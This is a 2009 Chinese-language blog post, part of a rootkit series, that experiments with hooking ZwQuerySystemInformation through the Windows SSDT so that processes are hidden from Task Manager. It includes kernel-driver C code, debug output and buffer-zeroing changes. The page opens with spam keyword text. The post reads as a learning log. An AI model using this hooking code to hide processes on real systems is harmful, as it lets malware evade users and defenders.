青草影院天堂男人久久,久久人人爽人人澡人人高潮AV ,嫩草伊人久久精品少妇AV

HOOK SSDT Hide Process （八）

Posted on 2009-10-28 14:38 S.l.e!ep.￠% 閱讀(336) 評論(0) 編輯收藏引用所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

繼 HOOK SSDT Hide Process （七）

用 HOOK SSDT Hide Process （七）? 的代碼雖然隱藏了進程，但會導致在 taskmgr.exe 全部進程看不到
而且運行一段時間后， taskmgr.exe 就會非法關閉

Q:
今天突然發現，如果 taskmgr.exe 中選中了 'Show processes from all users' 選項，還是可以看到其它進程的（taskmgr.exe成功隱藏），但為什么不選中就所以進程看不到？這么鬼異的問題估計要OD下 taskmgr.exe 才知道

為了一查究竟，我把 MyZwQuerySystemInformation 修改成如下的代碼

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?//定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(&process_name,?L"taskmgr.exe");
????
????rc?=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????if(NT_SUCCESS(rc))?
????{
????????
????????if(5?==?SystemInformationClass)
????????{?
????????????
????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????//if(curr->NextEntryDelta)
????????????//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????????????
????????????????????????????????UnHook();????????????

????????}//?if(5?==?SystemInformationClass)
????????
????}//?if(NT_SUCCESS(rc))
????

????//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
????return?rc;
}

在 DebugView 中顯示的內容如下:

Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?is?:0x8057cc27
MyZwQuerySystemInformation?is?:0xf8f0c080
Leave?DriverEntry!
ProcessName:(null)?NextEntryDelta:248?
ProcessName:System?NextEntryDelta:3528?
ProcessName:smss.exe?NextEntryDelta:400?
ProcessName:csrss.exe?NextEntryDelta:912?
ProcessName:winlogon.exe?NextEntryDelta:1304?
ProcessName:services.exe?NextEntryDelta:1176?
ProcessName:lsass.exe?NextEntryDelta:1360?
ProcessName:vmacthlp.exe?NextEntryDelta:280?
ProcessName:svchost.exe?NextEntryDelta:1360?
ProcessName:svchost.exe?NextEntryDelta:656?
ProcessName:svchost.exe?NextEntryDelta:3664?
ProcessName:svchost.exe?NextEntryDelta:464?
ProcessName:svchost.exe?NextEntryDelta:1104?
ProcessName:explorer.exe?NextEntryDelta:920?
ProcessName:spoolsv.exe?NextEntryDelta:848?
ProcessName:VMwareService.exe?NextEntryDelta:416?
ProcessName:VMwareTray.exe?NextEntryDelta:280?
ProcessName:VMwareUser.exe?NextEntryDelta:536?
ProcessName:ctfmon.exe?NextEntryDelta:272?
ProcessName:wscntfy.exe?NextEntryDelta:272?
ProcessName:alg.exe?NextEntryDelta:584?
ProcessName:cmd.exe?NextEntryDelta:264?
ProcessName:conime.exe?NextEntryDelta:272?
ProcessName:DriverMonitor.exe?NextEntryDelta:608?
ProcessName:notepad.exe?NextEntryDelta:272?
ProcessName:taskmgr.exe?NextEntryDelta:400?
ProcessName:Dbgview.exe?NextEntryDelta:0?
Unhook?leave!

接著再做一個嘗試，如果直接把第二個線程的信息的 NextEntryDelta 改為0 ，是不是 taskmgr.exe 就會只顯示一條線程？

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????IN?PVOID?SystemInformation,?
????????????????????IN?ULONG?SystemInformationLength,?
????????????????????OUT?PULONG?ReturnLength)?//定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(&process_name,?L"taskmgr.exe");
????
????rc?=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????if(NT_SUCCESS(rc))?
????{
????????
????????if(5?==?SystemInformationClass)
????????{?
????????????
????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;?
????????????
????????????if(curr->NextEntryDelta)
????????????????????????{
??????????????????????????curr->NextEntryDelta?=?0;
????????????}
????????????????????????
????????????????????????//????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????
????????????????????????/*
????????????while(curr)
????????????{
????????????????????????????????KdPrint(("ProcessName:%wZ?NextEntryDelta:%d?\n",?&curr->ProcessName,?curr->NextEntryDelta));
????????
????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);
????????????????else
????????????????????curr?=?NULL;
????????????????????
????????????????
????????????}//?while(curr)?
????????????????*/????????
?????????????????//???????????????UnHook();????????????

????????}//?if(5?==?SystemInformationClass)
????????
????}//?if(NT_SUCCESS(rc))
????

????//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
????return?rc;
}

情況還是?taskmgr.exe 中選中了 'Show processes from all users' 選項，就會顯示一條 System Idle Process 線程，如果不選中
'Show processes from all users' 這個選項，那么 Taskmgr.exe 的列表就會顯示為空

curr->NextEntryDelta?=?0; 那為何不把 curr 之后的數全部置為 0x00 ?
于是，加多幾句代碼

??????????????if(curr->NextEntryDelta)
????????????{
??????????????????????????KdPrint(("SystemInformationLength:%d?\n",?SystemInformationLength));
??????????????????????????curr->NextEntryDelta?=?0;
??????????????????????????memset((void*)((ULONG)curr?+?curr->NextEntryDelta),?0x00,?SystemInformationLength?-?curr->NextEntryDelta);
????????????}

此時，無論有無選中 'Show Process From all users'選項，所有進程都不顯示在 taskmgr.exe 了
另外還發現兩個現象
Q1. taskmgr.exe 調用 ZwQuerySystemInformation 時，ReturnLength?指針總是傳 NULL
Q2. taskmgr.exe 調用 ZwQuerySystemInformation 時，SystemInformationLength 總是傳 0x6000
難道 taskmgr.exe 并不是通過 NextEntryData 這個值來定位到下個進程的信息的？
?

只有注冊用戶登錄后才能發表評論。
【推薦】100%開源！大型工業跨平臺軟件C++源碼提供，建模，組態！

相關文章: Load Driver protect_pwd.txt Windows下Hook API技術 inline hook 對付API-splicing的一種簡單方法修改IAT實現API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤實現收藏一個反鍵盤記錄工具的分析不用hook 實現掛機鎖

網站導航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

S.l.e!ep.￠%

HOOK SSDT Hide Process （八）

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(1107)

隨筆檔案(1098)

文章檔案(1)

相冊

收藏夾(3)

DataStruct

搜索

積分與排名

最新評論

閱讀排行榜

評論排行榜